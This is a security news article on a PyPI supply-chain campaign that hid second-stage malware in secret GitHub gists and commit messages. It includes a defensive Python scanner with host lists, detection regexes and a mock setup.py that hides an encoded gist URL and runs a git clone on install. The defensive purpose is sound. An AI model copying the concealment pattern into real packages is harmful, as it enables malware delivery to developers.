Security researchers have recently identified a GitHub account exploiting lesser-known features of the platform to host stage-two malware, revealing a new level of sophistication in how cybercriminals use public services for their operations.
In an emerging trend, hackers are increasingly repurposing popular public platforms as bases for their malicious activities. They’ve been using public code repositories, file-sharing services, and even messaging apps to house and distribute malware, while running command-and-control (C2) operations through these channels. What’s more, they are finding innovative ways to use software-as-a-service (SaaS) platforms in ways that go unnoticed.
One such actor, operating under the GitHub account name *yeremyvalidslov2342*, was recently identified by ReversingLabs on December 19. This actor, referred to as “Yeremy,” utilized two under-the-radar GitHub features—gists and commits—to secretly deliver malicious payloads.
Exploiting GitHub’s Tools for Cyber Attacks
Typically, cybercriminals exploit public code repositories by posting malicious files under disposable accounts—a simple tactic that often leads to quick detection and removal by administrators.
Yeremy, however, took a more sophisticated approach. First, they released a series of packages to the Python Package Index (PyPI), a common target for attackers. These packages appeared to be legitimate libraries for network proxying, but hidden within their setup files was a Base64-encoded string that linked to a concealed GitHub “gist.”
Gists, a feature on GitHub, are like lightweight repositories where developers can share code snippets without creating full projects. Gists can be either public or “secret,” meaning they aren’t searchable or visible to the general public but can still be shared with specific individuals.
The gist linked from the PyPI packages contained the stage-two malware. This approach is rare: the only other known instance, reported by Trend Micro in 2019, involved a Slack backdoor that used gists in a similar way.
Yeremy was also connected to another PyPI package with a malicious setup file. In this case, when executed, the package cloned a legitimate-looking GitHub project called PySocks. The malware wasn’t in the repository’s files themselves; it was hidden in a commit message within that repository.
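The two delivery tricks described above (a Base64-encoded gist URL inside a PyPI setup file, and a setup file that shells out to git to clone a repository) can both be flagged by a simple static scan of setup.py before installation. The following is an added example written for this article, not code from ReversingLabs or the report; the sample setup file, the placeholder URLs and the host list are constructed for illustration.

```python
import base64
import binascii
import re

# Hosts that are a red flag when they turn up in a *decoded* string literal
# of a build script: a setup.py has no normal reason to reach for a gist.
SUSPICIOUS_HOSTS = ("gist.github.com", "gist.githubusercontent.com",
                    "raw.githubusercontent.com", "github.com")

# A quoted run of Base64 alphabet characters, at least 16 long, optional padding.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
# git invoked from the build script, as "git clone ..." or ["git", "clone", ...].
GIT_CALL = re.compile(r"""\bgit["',\s]+(clone|log|show)\b""")


def _try_decode(token):
    """Return decoded printable text for a Base64 literal, else None."""
    padded = token + "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_indicators(setup_source):
    """Scan setup.py source text; return a list of findings (empty if clean)."""
    findings = []
    for m in B64_LITERAL.finditer(setup_source):
        decoded = _try_decode(m.group(1))
        if decoded is None:
            continue
        host = next((h for h in SUSPICIOUS_HOSTS if h in decoded), None)
        if host:
            findings.append({"kind": "encoded_url", "host": host, "decoded": decoded})
    for m in GIT_CALL.finditer(setup_source):
        findings.append({"kind": "git_call", "command": m.group(0)})
    return findings


# Constructed sample setup.py mimicking the pattern in the article (placeholder URLs).
_ENCODED = base64.b64encode(b"https://gist.github.com/EXAMPLE-PLACEHOLDER/abc123").decode()
SAMPLE_SETUP_PY = """
from setuptools import setup
import base64, os
STAGE_TWO = "{enc}"
os.system("git clone https://github.com/EXAMPLE-PLACEHOLDER/PySocks")
setup(name="proxy-helper-example", version="0.1")
""".format(enc=_ENCODED)

if __name__ == "__main__":
    for finding in find_indicators(SAMPLE_SETUP_PY):
        print(finding)
```

Run against a package's extracted sdist, any `encoded_url` or `git_call` finding is reason to inspect the package by hand before it is installed.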
The Appeal of Public Services for Cybercriminals
Using public platforms like GitHub offers hackers several advantages. Operating from one’s own infrastructure provides resilience, but using shared and open-source resources enhances stealth.
“Some malware authors fear detection,” says Karlo Zanki, the report’s author. However, he adds, “if malicious code is properly obfuscated, public services aren’t adept at detecting it.”
Zanki also points out the challenges that repositories like npm and PyPI face, as they process thousands of packages daily with limited capacity for monitoring. While these repositories use traditional antivirus tools, many malicious packages still slip through the cracks. This leaves users with the burden of protecting themselves.
For hackers, public services present a compelling option: creating an account on a popular site is quicker, easier, and cheaper than setting up traditional infrastructure. Plus, the maintenance and uptime of these sites are managed by the hosting company, ensuring reliability. Traffic to well-known sites doesn’t raise the same red flags as connections to unknown servers, and if an account is deactivated, the hacker can quickly create a new one.
This case highlights how cybercriminals are continually adapting their methods to evade detection, using legitimate platforms in novel ways to conduct their operations. As these tactics evolve, the cybersecurity community must stay vigilant and develop new strategies to counter these sophisticated threats.